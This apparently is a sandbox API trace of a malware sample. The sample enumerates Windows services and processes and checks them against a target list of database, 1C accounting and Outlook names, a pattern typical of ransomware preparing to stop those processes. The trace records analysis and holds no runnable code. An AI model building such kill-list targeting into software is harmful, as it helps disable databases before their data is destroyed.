	[0155.584] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0155.584] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0155.585] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0155.585] lstrlenW (lpString="RpcEptMapper") returned 12
	[0155.585] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0155.585] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0155.585] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0155.585] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0155.585] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0155.585] lstrlenW (lpString="RpcSs") returned 5
	[0155.585] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0155.585] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0155.585] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0155.585] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0155.585] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0155.585] lstrlenW (lpString="SamSs") returned 5
	[0155.585] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0155.585] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0155.585] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0155.585] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0155.585] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0155.585] lstrlenW (lpString="Schedule") returned 8
	[0155.585] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0155.585] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0155.585] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0155.585] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0155.585] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0155.585] lstrlenW (lpString="SENS") returned 4
	[0155.585] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0155.585] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0155.585] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0155.585] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0155.586] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0155.586] lstrlenW (lpString="ShellHWDetection") returned 16
	[0155.586] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0155.586] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0155.586] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0155.586] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0155.586] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0155.586] lstrlenW (lpString="Spooler") returned 7
	[0155.586] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0155.586] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0155.586] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0155.586] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0155.586] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0155.586] lstrlenW (lpString="SysMain") returned 7
	[0155.586] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0155.586] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0155.586] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0155.586] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0155.586] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0155.586] lstrlenW (lpString="Themes") returned 6
	[0155.586] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0155.586] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0155.586] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0155.586] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0155.586] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0155.587] lstrlenW (lpString="TrkWks") returned 6
	[0155.587] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0155.587] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0155.587] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0155.587] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0155.587] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0155.587] lstrlenW (lpString="UxSms") returned 5
	[0155.587] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0155.587] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0155.587] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0155.587] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0155.587] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0155.587] lstrlenW (lpString="Winmgmt") returned 7
	[0155.587] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0155.587] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0155.587] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0155.587] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0155.587] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0155.587] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0xb612378 | out: hHeap=0x7ab0000) returned 1
	[0155.587] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x384
	[0155.589] Process32FirstW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0155.590] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0155.590] lstrlenW (lpString="System") returned 6
	[0155.590] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0155.590] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0155.590] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0155.590] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0155.590] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0155.590] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0155.590] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0155.590] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0155.590] lstrlenW (lpString="smss.exe") returned 8
	[0155.590] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0155.590] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0155.590] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0155.591] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0155.591] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0155.591] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0155.591] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0155.591] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0155.591] lstrlenW (lpString="csrss.exe") returned 9
	[0155.591] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0155.591] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0155.591] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0155.591] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0155.591] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0155.591] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0155.591] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0155.591] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0155.591] lstrlenW (lpString="wininit.exe") returned 11
	[0155.592] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0155.592] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0155.592] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0155.592] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0155.592] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0155.592] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0155.592] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0155.592] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0155.592] lstrlenW (lpString="csrss.exe") returned 9
	[0155.592] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0155.592] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0155.592] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0155.592] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0155.592] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0155.592] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0155.592] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0155.592] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0155.593] lstrlenW (lpString="winlogon.exe") returned 12
	[0155.593] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1
	[0155.593] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1
	[0155.593] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1
	[0155.593] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1
	[0155.593] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1
	[0155.593] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1
	[0155.593] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1
	[0155.593] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0155.593] lstrlenW (lpString="services.exe") returned 12
	[0155.593] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1
	[0155.593] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1
	[0155.593] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1
	[0155.593] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1
	[0155.593] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1
	[0155.593] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1
	[0155.593] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1
	[0155.593] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0155.594] lstrlenW (lpString="lsass.exe") returned 9
	[0155.594] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1
	[0155.594] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1
	[0155.594] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1
	[0155.594] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1
	[0155.594] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1
	[0155.594] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1
	[0155.594] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1
	[0155.594] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0155.594] lstrlenW (lpString="lsm.exe") returned 7
	[0155.594] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1
	[0155.594] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1
	[0155.594] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1
	[0155.594] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1
	[0155.594] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1
	[0155.594] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1
	[0155.594] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1
	[0155.594] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0155.595] lstrlenW (lpString="svchost.exe") returned 11
	[0155.595] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0155.595] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0155.595] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0155.595] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0155.595] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0155.595] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0155.595] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0155.595] lstrlenW (lpString="svchost.exe") returned 11
	[0155.595] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0155.596] lstrlenW (lpString="svchost.exe") returned 11
	[0155.596] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0155.596] lstrlenW (lpString="svchost.exe") returned 11
	[0155.596] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0155.596] lstrlenW (lpString="svchost.exe") returned 11
	[0155.596] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0155.597] lstrlenW (lpString="audiodg.exe") returned 11
	[0155.597] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0155.597] lstrlenW (lpString="svchost.exe") returned 11
	[0155.597] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0155.597] lstrlenW (lpString="svchost.exe") returned 11
	[0155.597] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0155.598] lstrlenW (lpString="spoolsv.exe") returned 11
	[0155.598] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0155.598] lstrlenW (lpString="svchost.exe") returned 11
	[0155.598] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0155.598] lstrlenW (lpString="taskhost.exe") returned 12
	[0155.598] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0155.599] lstrlenW (lpString="userinit.exe") returned 12
	[0155.599] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0155.599] lstrlenW (lpString="dwm.exe") returned 7
	[0155.599] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0155.599] lstrlenW (lpString="explorer.exe") returned 12
	[0155.599] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0155.600] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0155.600] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0155.600] lstrlenW (lpString="reader_sl.exe") returned 13
	[0155.600] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0
	[0155.600] CloseHandle (hObject=0x384) returned 1
	[0155.600] Sleep (dwMilliseconds=0x1f4) 
	[0156.517] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb616f08
	[0156.719] EnumServicesStatusExW (in: hSCManager=0xb616f08, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0156.719] GetLastError () returned 0xea
	[0156.719] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xe90) returned 0xb612378
	[0156.719] EnumServicesStatusExW (in: hSCManager=0xb616f08, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb612378, cbBufSize=0xe90, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb612378, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0156.719] CloseServiceHandle (hSCObject=0xb616f08) returned 1
	[0156.720] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0156.720] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0156.720] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0156.720] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0156.720] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0156.720] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0156.720] lstrlenW (lpString="AudioSrv") returned 8
	[0156.720] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0156.720] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0156.720] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0156.720] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0156.720] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0156.720] lstrlenW (lpString="BFE") returned 3
	[0156.720] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0156.720] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0156.720] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0156.720] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0156.720] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0156.720] lstrlenW (lpString="CryptSvc") returned 8
	[0156.720] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0156.720] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0156.720] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0156.720] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0156.720] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0156.720] lstrlenW (lpString="CscService") returned 10
	[0156.720] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0156.720] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0156.720] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0156.721] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0156.721] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0156.721] lstrlenW (lpString="DcomLaunch") returned 10
	[0156.721] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0156.721] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0156.721] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0156.721] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0156.721] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0156.721] lstrlenW (lpString="Dhcp") returned 4
	[0156.721] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0156.721] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0156.721] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0156.721] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0156.721] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0156.721] lstrlenW (lpString="Dnscache") returned 8
	[0156.721] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0156.721] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
